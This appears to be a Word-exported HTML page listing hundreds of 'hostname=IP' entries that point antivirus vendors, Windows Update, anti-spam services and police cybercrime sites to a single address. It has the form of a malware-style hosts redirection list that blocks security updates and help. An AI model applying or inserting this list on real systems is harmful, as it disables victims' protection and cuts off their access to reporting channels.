<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">free.grisoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">msecn.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.bitdefender.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.bitdefender.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.bitdefender.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">myaccount.bitdefender.co,=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forum.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">upgrade.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">agnitum.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.agnitum.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">agnitum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.agnitum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">agnitum.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.agnitum.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">outpostfirewall.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.outpostfirewall.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl1.agnitum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl2.agnitum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forums.comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">comodogroup.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.comodogroup.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">personalfirewall.comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.personalfirewall.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">hackerguardian.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.hackerguardian.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nsclean.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nsclean.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">db.local.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamsupport.sourcefire.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lurker.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wiki.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">w32.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lists.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamwin.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.clamwin.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ru.clamwin.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gietl.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.gietl.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamav.dyndns.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">support.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">f-secure.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.f-secure.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">europe.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.europe.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">f-secure.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.f-secure.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">support.f-secure.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.f-secure.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">f-secure.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.f-secure.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">retail.sp.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">retail01.sp.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">retail02.sp.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.europe.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">norman.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.norman.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.norman.no=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sandbox.norman.no=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">norman.no=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.norman.no=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">niuone.norman.no=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pandasecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.pandasecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">viruslab.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.viruslab.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pandasoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.pandasoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">acs.pandasoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.pandasoftware.es=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anti-virus.by=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.anti-virus.by=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virusblokada.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.virusblokada.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">vba32.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.vba32.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.nai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">secuser.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.secuser.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">tds.diamondcs.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">windowsupdate.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lavasoftusa.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.lavasoftusa.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lavasoftusa.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.lavasoftusa.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">diamondcs.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">shop.ca.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads.my-etrust.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">v4.windowsupdate.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">v5.windowsupdate.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">noadware.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.noadware.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">zonelabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.zonelabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">moosoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.moosoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">secuser.model-fx.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pccreg.antivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">k-otik.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">vupen.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.vupen.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">housecall.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">us.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">uk.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">de.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">fr.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">es.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">au.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">it.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">br.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.cai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sophos.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.sophos.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">securitoo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nordnet.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nordnet.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avgfrance.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avgfrance.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus-online.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.antivirus-online.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.esafe.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.microworldsystems.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.ca.co=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">files.trendmicro-europe.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">inline-software.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ravantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.ravantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">f-prot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.f-prot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">files.f-prot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">secure.f-prot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">vsantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.vsantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">openantivirus.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.openantivirus.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www3.ca.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dialognauka.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.dialognauka.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anti-virus-software-review.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.anti-virus-software-review.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.vet.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antiviraldp.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.antiviraldp.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.proantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pestpatrol.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.pestpatrol.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">simplysup.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.simplysup.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">misec.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.misec.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www1.my-etrust.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">authentium.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.authentium.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">finjan.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.finjan.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.ikarus-software.at=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.ika-rus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ika-rus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">tinysoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.tinysoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">visualizesoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.visualizesoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kerio.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kerio.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kerio.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.zonelabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">zonelog.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.zonelog.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">webroot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.webroot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.lavasoft.nu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">spywareguide.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spywareguide.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">spyblocker-software.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spyblocker-software.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spamhaus.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">spamcop.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spamcop.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bobbear.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.bobbear.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">domaintools.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.domaintools.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">centralops.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.centralops.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.robtex.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dnsstuff.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.dnsstuff.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ripe.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.ripe.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.met.police.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nbi.gov.ph=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nbi.gov.ph=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.police.gov.hk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">treasury.gov=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.treasury.gov=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cybercrime.gov=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.cybercrime.gov=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.cybercrime.ch=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">enisa.europa.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.enisa.europa.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.interpol.int=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.fsa.gov.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.companies-house.gov.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">fraudaid.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.fraudaid.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">scambusters.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.scambusters.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">spamtrackers.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spamtrackers.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
